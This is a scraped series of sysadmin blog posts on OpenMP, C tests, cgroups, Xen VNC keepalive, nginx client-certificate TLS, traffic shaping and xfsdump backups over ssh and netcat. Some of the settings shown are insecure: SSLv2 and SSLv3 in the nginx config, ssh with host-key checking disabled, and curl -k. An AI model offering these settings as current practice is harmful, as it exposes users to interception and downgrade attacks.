Xenoprof is a system-wide profiler for Xen virtual machine environments, capable of profiling the Xen virtual machine monitor, multiple Linux guest operating systems, and applications running on them. (http://xenoprof.sourceforge.net/)A little bit outdated but still useful Xenoprof overview & Networking Performance Analysis.
SMP as easy as you cannot imagine
In contrast to MPP where MPI is a standard, in the world of SMP pthreads are de facto standard way to make your program execute in parallel. But there is another standard, OpenMP.
test_parallel.c
test_parallel.c
#include <stdio.h> #include <unistd.h> #ifdef _OPENMP #include <omp.h> #else #define omp_get_thread_num() 0 #endif int main(int argc, char *argv) { int n = 10; int i; #pragma omp parallel { printf("thread %d\n", omp_get_thread_num()); #pragma omp for for (i = 1; i <= n; i++ ) { sleep(1); } } }Test
gcc test_parallel.c time ./a.out thread 0 real 0m10.002s user 0m0.000s sys 0m0.001sEnable OpenMP
gcc -fopenmp test_parallel.c time ./a.out thread 3 thread 7 thread 0 thread 4 thread 1 thread 5 thread 6 thread 2 real 0m2.002s user 0m0.009s sys 0m0.004s
Smoke and unit tests for C
Take a look at vstr library source code. This is de facto a standard on tests implementation in C without any additional tools like googletest. See below what to do if you do not want to put one more tool to your project but still need tests.
tst_main.c
Script to start tests test.sh
tst_main.c
#include <stdlib.h> #include "backup_app.h" #include "tst.h" int main (int argc, char ** argv) { DBHOST = "127.0.0.1"; DBUSER = "root"; DBDB = "???"; DBPORT = 3306; return tst(); } /*--------------------------------------------------- mocks */ int snmp_log(int priority, const char *format, ...) { va_list ap; va_start(ap, format); if (vfprintf(stderr, format, ap) < 0) goto error; va_end(ap); return 0; error: va_end(ap); return 1; }One of the tests, tst_cmd_ok.c
#include <stdlib.h> #include "extern_cmd.h" #include "tst.h" int tst() { int ret; char *args[] = {"/bin/ls", "-l", NULL}; char *res = mb_cmd_exec(args, NULL); ret = (res) ? SUCCESS : FAILED; free(res); return ret; }Makefile
.PHONY: clean CC=gcc CFLAGS=-g -Wall -I.. LDFLAGS=-Wl,--unresolved-symbols=ignore-all HEADERS=$(wildcard ../*.h) OBJECTS=$(patsubst %.c,%.o,$(wildcard *.c)) TO_TEST_OBJECTS=$(patsubst %.c,%.o,$(wildcard ../*.c)) MAIN_TST_OBJ=tst_main.o BUILDLIBS=-lmysqlclient_r -lpthread _TESTS=$(patsubst %.c,%,$(wildcard *.c)) TESTS=$(patsubst tst_main,,$(_TESTS)) all: $(OBJECTS) $(TESTS) %.o: %.c $(HEADERS) $(CC) $(CFLAGS) -c $< $(TESTS): $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) $(OBJECTS) $(CC) $(CFLAGS) $(LDFLAGS) $(patsubst %,%.o,$@) $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) -o $@ $(BUILDLIBS) clean: rm -f *~ *.o $(TESTS)Note LDFLAGS=-Wl,--unresolved-symbols=ignore-all
Script to start tests test.sh
#!/bin/sh for result in `find . -maxdepth 1 -perm /u=x,g=x,o=x -type f -name 'tst_*'`; do $result exit_st=$? if [ $exit_st -eq 0 ] then echo $result : ok else echo $result : failed fi done
Simplistic ORM like thing in C for MySQL
Take a look at extern_mysql.h and extern_mysql.c. It is a simple request to struct mapping done in C for MySQL 5.0 and above for one of the projects. libmysql_r is not the simplest thing to work with, code provided was tested in production, so it works, take a look if you had a bad day and were forced to get data from MySQL in C.
A few words about an interface. To get data from mysql:
1) add request to mb_mysql_stmt:
If you want to get single value from db you can use, for instance
2) add request number to mb_db_stmt_e enum:
A few words about an interface. To get data from mysql:
1) add request to mb_mysql_stmt:
mb_mysql_stmt_t mb_mysql_stmt[] = { ... { "select * from SCHEDULE", NULL, NULL, sizeof(mb_db_schedule_t), bind_r_schedule }, ... };where bind_r_schedule is a binding definition:
mb_bind_t bind_r_schedule[] = { {"schedule_id", offsetof(mb_db_schedule_t, schedule_id), sizeof(((mb_db_schedule_t*)0)->schedule_id), 0}, {"name", offsetof(mb_db_schedule_t, name), sizeof(((mb_db_schedule_t*)0)->name), 0}, {"schedule_type", offsetof(mb_db_schedule_t, schedule_type), sizeof(((mb_db_schedule_t*)0)->schedule_type), 0}, {"enabled", offsetof(mb_db_schedule_t, enabled), sizeof(((mb_db_schedule_t*)0)->enabled), 0}, {"last_backup", offsetof(mb_db_schedule_t, last_backup), sizeof(((mb_db_schedule_t*)0)->last_backup), 0}, {NULL, 0, 0, 0} };This means that mb_db_exec() will return an array of mb_db_schedule_t, each element of this array will correspond to one row in the result set. To map fields in result set to struct members bindings are used, consult C API Prepared Statement Type Codes to map mysql types to C ones (for MYSQL_TIME mb_time_t is defined). The length of the array will be stored in variable pointed by the count argument of the mb_db_exec() function.
If you want to get single value from db you can use, for instance
mb_bind_t bind_r_config_value[] = { {"value", 0, 256, 0}, {NULL, 0, 0, 0} }; mb_mysql_stmt_t mb_mysql_stmt[] = { ... { "select value from CONFIG where `key`='address'", NULL, NULL, 256, bind_r_config_value }, ... };We do not use struct and map the whole row to buffer of 256 bytes (256 is the max length of the value field in config table), to obtain results call
char *data; data = mb_db_exec(mb_db_ip_address_stmt, NULL); if (!data) mb_log_err("cannot find ip address");Note that we do not need count here. Also note that bindings can be reused (bind_r_config_value can be used to obtain various values from config table).
2) add request number to mb_db_stmt_e enum:
typedef enum { ... mb_db_ip_address_stmt } mb_db_stmt_e;
Cgroups, limit memory
If some application may eat a lot of memory and cause swapping you can put it to sandbox
Test app memtest.c
Test app memtest.c
#include <stdlib.h> #include <stdio.h> int main() { int i; void *p; p = NULL; for (i = 0; 1; i+= 4096) { p = malloc(4096); if (!p) { perror("malloc"); break; } printf("allocated %d bytes\n", i); } }Create new group and add to it current shell process
mkdir /sys/fs/cgroup/memory/0 echo $$ > /sys/fs/cgroup/memory/0/tasksConfigure memory limit
echo 4M > /sys/fs/cgroup/memory/0/memory.limit_in_bytesTest
gcc memtest.c ./a.out ... allocated 3997696 bytes KilledAs you mentioned malloc didn't return NULL, app receives a signal and terminates because swap is not used and kernel kills one of the processes when there is no enough free memory left.
Prepare sparse raw image with ntfs
Create sparse file
dd if=/dev/zero of=test.img bs=1 count=0 seek=1995G 0+0 records in 0+0 records out 0 bytes (0 B) copied, 1.1611e-05 s, 0.0 kB/sCreate partition table
echo 'n p 1 t 7 w ' | /sbin/fdisk -u test.img Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel Building a new DOS disklabel with disk identifier 0x2cddb521. Changes will remain in memory only, until you decide to write them. After that, of course, the previous content won't be recoverable. Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite) Command (m for help): Partition type: p primary (0 primary, 0 extended, 4 free) e extended Select (default p): Partition number (1-4, default 1): First sector (2048-4183818239, default 2048): Using default value 2048 Last sector, +sectors or +size{K,M,G} (2048-4183818239, default 4183818239): Using default value 4183818239 Command (m for help): Selected partition 1 Hex code (type L to list codes): Changed system type of partition 1 to 7 (HPFS/NTFS/exFAT) Command (m for help): The partition table has been altered! Syncing disks.Format first partition
/sbin/kpartx -a test.img /usr/sbin/mkntfs -c4096 -s512 -p63 -H255 -S63 -Ff --label Drive_E /dev/mapper/loop0p1 /sbin/kpartx -d test.img loop deleted : /dev/loop0Mount/umount first partition
/sbin/kpartx -a test.img mkdir exposed /usr/bin/ntfs-3g -o rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/mapper/loop0p1 exposed ... umount exposed /sbin/kpartx -d test.img loop deleted : /dev/loop0
How to debug Sun RPC
I bet you used to debug web services via some sniffer like wireshark. This is possible because of protocol simplicity (yes, event if it is SOAP with attachments it is still simple text xml based protocol).
Sun RPC is rather popular IPC mechanism on Linux, it reminds Java Sun RMI by its nature. Sun RPC is complex, binary and uses multiple connections. In brief there is an rpcbind daemon (or portmapper in other words) that is a registry of services, client asks rpcbind about port of specific service and then connects directly to service. For instance, NFS is build around Sun RPC, nfs-server uses 2049 port by default but it can be registered on any other port and clients still can find it by registry (nfs-utils prior to 1.2 has hardcoded 2049 port though).
So how to deal with this if you hit some trouble? There is an rpcdebug util
Sun RPC is rather popular IPC mechanism on Linux, it reminds Java Sun RMI by its nature. Sun RPC is complex, binary and uses multiple connections. In brief there is an rpcbind daemon (or portmapper in other words) that is a registry of services, client asks rpcbind about port of specific service and then connects directly to service. For instance, NFS is build around Sun RPC, nfs-server uses 2049 port by default but it can be registered on any other port and clients still can find it by registry (nfs-utils prior to 1.2 has hardcoded 2049 port though).
So how to deal with this if you hit some trouble? There is an rpcdebug util
The rpcdebug command allows an administrator to set and clear the Linux kernel's NFS client and server debug flags. Setting these flags causes the kernel to emit messages to the system log in response to NFS activity; this is typically useful when debugging NFS problems.
rpcdebug -vh usage: rpcdebug [-v] [-h] [-m module] [-s flags...|-c flags...] set or cancel debug flags. Module Valid flags rpc xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache all nfs vfs dircache lookupcache pagecache proc xdr file root callback client mount all nfsd sock fh export svc proc fileop auth repcache xdr lockd all nlm svc client clntlock svclock monitor clntsubs svcsubs hostcache xdr all rpcdebug -m rpc -s all rpc xprt call debug nfs auth bind sched trans svcsock svcdsp misc cacheSee /var/log/syslog
... Jan 6 13:40:58 HDC05 kernel: [1430624.387439] RPC: set up transport to address addr=10.1.2.11 port=48355 proto=udp Jan 6 13:40:58 HDC05 kernel: [1430624.387533] RPC: created transport ffff88000eb2c000 with 16 slots Jan 6 13:40:58 HDC05 kernel: [1430624.387588] RPC: creating mount client for db01 (xprt ffff88000eb2c000) Jan 6 13:40:58 HDC05 kernel: [1430624.387672] RPC: creating UNIX authenticator for client ffff88002f863200 Jan 6 13:40:58 HDC05 kernel: [1430624.389041] RPC: 0 holding NULL cred ffffffffa0118da0 Jan 6 13:40:58 HDC05 kernel: [1430624.389091] RPC: new task initialized, procpid 21435 Jan 6 13:40:58 HDC05 kernel: [1430624.389142] RPC: allocated task ffff88002b3fe1c0 Jan 6 13:40:58 HDC05 kernel: [1430624.389192] RPC: 850 __rpc_execute flags=0x280 Jan 6 13:40:58 HDC05 kernel: [1430624.389240] RPC: 850 call_start mount3 proc NULL (sync) Jan 6 13:40:58 HDC05 kernel: [1430624.389290] RPC: 850 call_reserve (status 0) ...
Xen VNC and stale tcp connections
The problem: in case vnc client terminates and doesn't send packet with FIN/RST flag (for instance, VNC connection was tunneled through VPN and tunnel was closed), connection on server side remains in ESTABLISHED state and one cannot connect to this VM via VNC again, see vnc stops working after a while.
The solution of this simple problem is a bit complicated. First of all tcp keepalive on vnc server socket should be turned on, in other words one must patch qemu-dm that implements VNC in Xen (Xen Opensource 3.4.2).
Configure linux kernel
Test
09:05:45.286580 IP 10.10.17.216.1312 > 10.10.17.11.5901: P 84:94(10) ack 3649 win 63679
Note, one can kill stale connection with the help of netfilter by setting conntrack net.netfilter.nf_conntrack_tcp_timeout_established to 1-2 hours (default is 5 days). After this time elapses iptables will send RST in both directions. But one still need to set proper net.ipv4.tcp_retries2.
The solution of this simple problem is a bit complicated. First of all tcp keepalive on vnc server socket should be turned on, in other words one must patch qemu-dm that implements VNC in Xen (Xen Opensource 3.4.2).
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/osdep.c xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c --- xen-3.4.2/tools/ioemu-qemu-xen/osdep.c 2009-11-05 11:44:56.000000000 +0000 +++ xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c 2011-12-28 13:43:29.938649747 +0000 @@ -338,4 +338,11 @@ f = fcntl(fd, F_GETFL); fcntl(fd, F_SETFL, f | O_NONBLOCK); } + +int socket_set_keepalive(int fd) { + int optval; + + optval = 1; + return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &optval, sizeof(optval)); +} #endif diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h --- xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h 2009-11-05 11:44:56.000000000 +0000 +++ xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h 2011-12-28 13:43:32.788255661 +0000 @@ -41,6 +41,7 @@ /* misc helpers */ void socket_set_nonblock(int fd); +int socket_set_keepalive(int fd); int send_all(int fd, const void *buf, int len1); /* New, ipv6-ready socket helper functions, see qemu-sockets.c */ diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/vnc.c xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c --- xen-3.4.2/tools/ioemu-qemu-xen/vnc.c 2009-11-05 11:44:56.000000000 +0000 +++ xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c 2011-12-28 13:44:59.283974757 +0000 @@ -2389,6 +2389,8 @@ VNC_DEBUG("New client on socket %d\n", vs->csock); dcl->idle = 0; socket_set_nonblock(vs->csock); + if (socket_set_keepalive(vs->csock) == -1) + VNC_DEBUG("Cannot set KEEPALIVE on socket %d\n", vs->csock); qemu_set_fd_handler2(vs->csock, NULL, vnc_client_read, NULL, opaque); vnc_write(vs, "RFB 003.008\n", 12); vnc_flush(vs);Recompile xen tools (make tools, see xen README) and replace qemu-dm executable with dist/install/usr/lib64/xen/bin/qemu-dm.
Configure linux kernel
HDC11:~# sysctl -a | grep ipv4.tcp_keep net.ipv4.tcp_keepalive_time = 30 net.ipv4.tcp_keepalive_probes = 5 net.ipv4.tcp_keepalive_intvl = 10This means in case there are no packets during 30 secs send empty packet, if no ACK received send 5 packets every 10 secs, if still no answer send RST and close connection.
Test
HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm tcp 0 0 10.10.17.11:5901 10.10.17.216:1334 ESTABLISHED 28905/qemu-dm <---- VNC connection via VPN HDC11:~# tcpdump -n -i eth2 port 1334 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth2, link-type EN10MB (Ethernet), capture size 96 bytes 07:42:15.119612 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1601431976 win 5840 07:42:15.316704 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228 07:42:45.319980 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- acks every 30 secs 07:42:45.701610 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228 <--- response to ack 07:43:15.700307 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- kill vpn, no response anymore 07:43:25.700398 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 07:43:35.700586 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 07:43:45.700639 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 07:43:55.700765 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- 5 probes every 10 secs 07:44:05.700913 IP 10.10.17.11.5901 > 10.10.17.216.1334: R 1:1(0) ack 1 win 5840 <--- still no response, RST ^C 10 packets captured 10 packets received by filter 0 packets dropped by kernel HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm <--- no ESTABLISHED connections HDC11:~# telnet localhost 5901 <--- we can connect to this port again Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. RFB 003.008 <--- server responds ^] telnet> quitBut we need to go deeper. Tcp keepalive works only when there are no packets on the wire. Imagine VNC server sent some packet and connection terminated in silent way (i.e. it didn't receive ACK in his packet). In this case linux will try to resend packet until RTO.
07:57:36.123013 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1557:1598(41) ack 377 win 5840 07:57:36.317922 IP 10.10.17.216.1421 > 10.10.17.11.5901: P 377:387(10) ack 1598 win 63353 <--- here we lost connection 07:57:36.360862 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:06.317741 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:16.321445 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:16.932260 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- vnc server (qemu-dm) tries to send some data 07:58:17.621451 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- retransmit algorithm starts with dynamic growing intervals 07:58:19.001467 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:58:21.761500 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:58:27.281590 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:58:38.321648 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:59:00.401919 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:59:44.562552 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:01:12.883584 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:03:12.885069 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:05:12.886487 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:07:12.887861 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:09:12.889364 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:11:12.890812 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:13:12.892282 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:15:12.893702 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- ok, now reno gives up, connection is closed after ~15 mins HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm15 mins without ability to connect to VM is too long for client. Configure kernel again - decrease /proc/sys/net/ipv4/tcp_retries2 (net.ipv4.tcp_retries2) from 15 to 5 tries.
09:05:45.286580 IP 10.10.17.216.1312 > 10.10.17.11.5901: P 84:94(10) ack 3649 win 63679
09:05:45.320669 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840 09:06:15.281030 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840 09:06:25.281213 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840 09:06:25.961866 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840 09:06:26.661261 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840 09:06:28.061265 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840 09:06:30.861301 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840 09:06:36.461346 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840 09:06:47.661424 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840 ~60-90 secsAs a result one can reestablish connection to VNC in 1-2 mins.
Note, one can kill stale connection with the help of netfilter by setting conntrack net.netfilter.nf_conntrack_tcp_timeout_established to 1-2 hours (default is 5 days). After this time elapses iptables will send RST in both directions. But one still need to set proper net.ipv4.tcp_retries2.
Nginx, two-way ssl authentication
See Mutual authentication or two-way authentication.
Nginx config excerpt
- Client has X509 cert and private key.
- Server has its own cert and key and client cert.
- At connection establishing time server checks client cert and client checks server cert. Server also knows client name after auth.
openssl genpkey -algorithm RSA -out cert.key
openssl req -new -x509 -key cert.key -out cert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:localhost
Email Address []:
Note, Common Name must be equal to domain name.Nginx config excerpt
server { listen 443; server_name localhost; ssl on; ssl_certificate cert.pem; ssl_certificate_key cert.key; ssl_session_timeout 5m; ssl_protocols SSLv2 SSLv3 TLSv1; ssl_ciphers HIGH:!aNULL:!MD5; ssl_prefer_server_ciphers on; location / { root html; index index.html index.htm; } }Test
curl -k -i https://localhost/ HTTP/1.1 200 OK Server: nginx/1.1.11 Date: Fri, 16 Dec 2011 11:56:28 GMT Content-Type: text/html Content-Length: 151 Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT Connection: keep-alive Accept-Ranges: bytes <html> <head> <title>Welcome to nginx!</title> </head> <body bgcolor="white" text="black"> <center><h1>Welcome to nginx!</h1></center> </body> </html>The -k parameter must be specified because server cert is self-signed, see curl(1).
-k/--insecureThis was one-way ssl. Add following lines to config to require client cert
(SSL) This option explicitly allows curl to perform "insecure" SSL connections and transfers. All SSL connections are attempted to be made secure by using the CA certificate bundle installed by default. This makes all connections considered "insecure" fail unless -k/--insecure is used.
server { ... ssl_verify_client on; ssl_client_certificate client.pem; ... }Test
curl -k -i https://localhost/ HTTP/1.1 400 Bad Request Server: nginx/1.1.11 Date: Fri, 16 Dec 2011 12:09:38 GMT Content-Type: text/html Content-Length: 253 Connection: close <html> <head><title>400 No required SSL certificate was sent</title></head> <body bgcolor="white"> <center><h1>400 Bad Request</h1></center> <center>No required SSL certificate was sent</center> <hr><center>nginx/1.1.11</center> </body> </html> curl -k -i --cert cert.pem --key cert.key https://localhost/ HTTP/1.1 200 OK Server: nginx/1.1.11 Date: Fri, 16 Dec 2011 12:01:56 GMT Content-Type: text/html Content-Length: 151 Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT Connection: keep-alive Accept-Ranges: bytes <html> <head> <title>Welcome to nginx!</title> </head> <body bgcolor="white" text="black"> <center><h1>Welcome to nginx!</h1></center> </body> </html>User agents (google-chrome, firefox, others) often use PKCS#12 format (files with .p12 extension). One can convert pair cert.pem/cert.key into PKCS#12 via openssl
openssl pkcs12 -export -in cert.pem -inkey cert.key -out cert.p12Then import cert.p12 into browser and go to https://localhost/. Note, use certificate chains and one certificate as root for all client certs, nginx will authenticate clients against this certificate.
Monday, December 23, 2013
Debug and profile erlang linked in driver
OTP tools like fprof refuse to profile your .so (for a good reason). So how to do this?
erl is like any other executable loads linked in driver as a shared library and one can intorspect this shared library like any other. During compilation one need to add debug info to .so file (-ggdb flag for gcc) then attach to running erlang virtual machine from gdb or kdbg or similar.
To profile do the following
In this particular example you can see cons (|) for list creation is really slow (procedure ei_x_encode_list_header). Knowing list size beforehand decreases caller relative execution time from 34.45% to 23.25%.
Note that profiling is not a sign of premature optimization but also a sanity check that you do not do some insane things.
erl is like any other executable loads linked in driver as a shared library and one can intorspect this shared library like any other. During compilation one need to add debug info to .so file (-ggdb flag for gcc) then attach to running erlang virtual machine from gdb or kdbg or similar.
> ps ax | grep erlang 9801 pts/1 Sl+ 0:00 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp -K true -- -root /usr/lib64/erlang -progname erl -- -home /home/adolgarev -- 11208 pts/0 S+ 0:00 grep erlang > kdbg -p 9801 /usr/lib64/erlang/erts-5.8.1/bin/beam.smpNow breakpoints can be added and program state inspected
To profile do the following
valgrind --tool=callgrind --trace-children=yes /usr/bin/erlRun tests, grab callgrind.out.PID, open it in kcachegrind
In this particular example you can see cons (|) for list creation is really slow (procedure ei_x_encode_list_header). Knowing list size beforehand decreases caller relative execution time from 34.45% to 23.25%.
Note that profiling is not a sign of premature optimization but also a sanity check that you do not do some insane things.
How to limit network bandwidth and introduce latency
So you want to test clients of some service like nfs in case network or service is slow. In order to do this you need to limit network throughput, introduce latency and jitter (latency variation). Ok, I bet you know how to do this
Simple test. On server side
tc qdisc add dev eth0 root handle 1: prio tc qdisc add dev eth0 parent 1:3 handle 30: tbf rate 1mbit buffer 10kb limit 3000 tc qdisc add dev eth0 parent 30:1 handle 31: netem delay 100ms 10ms distribution normal tc filter add dev eth0 protocol ip parent 1:0 prio 3 u32 match ip dst 192.168.44.4/32 flowid 1:3See Linux Advanced Routing & Traffic Control HOWTO.
Simple test. On server side
iperf -s ------------------------------------------------------------ Server listening on TCP port 5001 TCP window size: 85.3 KByte (default) ------------------------------------------------------------ [ 4] local 192.168.44.4 port 5001 connected with 192.168.44.26 port 37494 [ ID] Interval Transfer Bandwidth [ 4] 0.0-14.6 sec 1.52 MBytes 870 Kbits/secOn client side
iperf -c 192.168.44.4 ------------------------------------------------------------ Client connecting to 192.168.44.4, TCP port 5001 TCP window size: 16.0 KByte (default) ------------------------------------------------------------ [ 3] local 192.168.44.26 port 37494 connected with 192.168.44.4 port 5001 [ ID] Interval Transfer Bandwidth [ 3] 0.0-11.8 sec 1.52 MBytes 1.08 Mbits/secCleanup
tc qdisc del dev eth0 root
How to backup sparse file over network
Rsync will drive CPU or IO crazy. One needs to use fs specific utils to perform this kind of task. For instance, for XFS one can use xfsdump and xfsrestore via ssh tunnel
/usr/bin/ssh -o 'UserKnownHostsFile /dev/null' -o 'StrictHostKeyChecking no' -o 'ExitOnForwardFailure yes' -L1234:localhost:1234 test@192.168.14.189 'netcat -l -v -p 1234 | /sbin/xfsrestore - /home/bckp'
Restore Status: SUCCESS
/sbin/xfsdump -s /a/b/c -F - /home | netcat localhost 1234
Dump Status: SUCCESS
Things to note.- ssh options 'UserKnownHostsFile /dev/null' and 'StrictHostKeyChecking no' omit known_hosts check, see ssh_config(5).
- ssh option 'ExitOnForwardFailure yes' forces ssh to exit with error if it failed to forward ports.
- carefully with netcat, it has 2 different cli.
- see xfsdump(8) and xfsrestore(8).
How to change path to backing file in qcow2
Standard utility cannot do this. Take C and qcow2 image format doc and write something like
#define ntohll(x) (((uint64_t)(ntohl((uint32_t)((x << 32) >> 32))) << 32) | ntohl(((uint32_t)(x >> 32)))) /* change filename in qcow2 */ int backing_file_patch(const char *in_file, const char *new_backing_file) { int f; uint64_t backing_file_offset; uint32_t backing_file_size; if ((f = open(in_file, O_RDWR)) == -1) { perror("open"); goto error; } if (lseek(f, 8, SEEK_SET) == (off_t)-1) { perror("lseek"); goto error; } if (read(f, &backing_file_offset, sizeof(backing_file_offset)) == -1) { perror("read"); goto error; } backing_file_offset = ntohll(backing_file_offset); backing_file_size = strlen(new_backing_file); backing_file_size = htonl(backing_file_size); /* update backing_file_size */ if (write(f, &backing_file_size, sizeof(backing_file_size)) == -1) { perror("write"); goto error; } /* update path */ if (lseek(f, backing_file_offset, SEEK_SET) == (off_t)-1) { perror("lseek"); goto error; } if (write(f, new_backing_file, strlen(new_backing_file)) == -1) { perror("write"); goto error; } close(f); return 0; error: close(f); return 1; }To test this
/usr/sbin/xm block-attach 0 tap:qcow2:/home/test/vm_drive_C_snapshot.qcow2 /dev/xvda w 0 /bin/ntfs-3g -o dev_offset=7340032,rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/xvda exposedCleanup
/bin/umount exposed /usr/sbin/xm block-detach 0 51712
Sunday, December 22, 2013
Don't parse output from system utilities
One often can see that some system utility returns information he needs. Then he does a wrong thing: parses output from this utility. We'll do opposite. For instance, we'll get broadcast address
P.S. The funniest bug I've seen is when one mixed stdout and stderr and got every time new result upon parsing due to two streams are mixed in an unpredictable way. The other one was due to i18n feature.
/sbin/ifconfig eth1 eth1 Link encap:Ethernet HWaddr 00:0A:CD:14:CD:77 inet addr:192.168.44.177 Bcast:192.168.44.255 Mask:255.255.255.0 inet6 addr: fe80::20a:cdff:fe14:cd77/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:791580 errors:0 dropped:0 overruns:0 frame:0 TX packets:381581 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:468681235 (446.9 Mb) TX bytes:47469801 (45.2 Mb) Interrupt:18 Base address:0xc000What does ifconfig do to get this info?
strace /sbin/ifconfig eth1 ... socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4 ... ioctl(4, SIOCGIFBRDADDR, {ifr_name="eth1", ifr_broadaddr={AF_INET, inet_addr("192.168.44.255")}}) = 0 ...strace shows that descriptor 4 is passed to ioctl. In python one can do the same
# get the constant beforehand grep -R SIOCGIFBRDADDR /usr/include/* /usr/include/bits/ioctls.h:#define SIOCGIFBRDADDR 0x8919 /* get broadcast PA address */ import fcntl, socket, struct s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_IP) SIOCGIFBRDADDR = 0x8919 iface = struct.pack('256s', 'eth1') info = fcntl.ioctl(s.fileno(), SIOCGIFBRDADDR, iface) socket.inet_ntoa(info[20:24]) '192.168.44.255'Why we get bytes from 20 to 24? One passes struct ifreq to ioctl (see netdevice(7)), IFNAMSIZ is 16, plus offsetof(struct sockaddr_in, sin_addr), this equals to 20, and plus unsigned long that is 4 bytes.
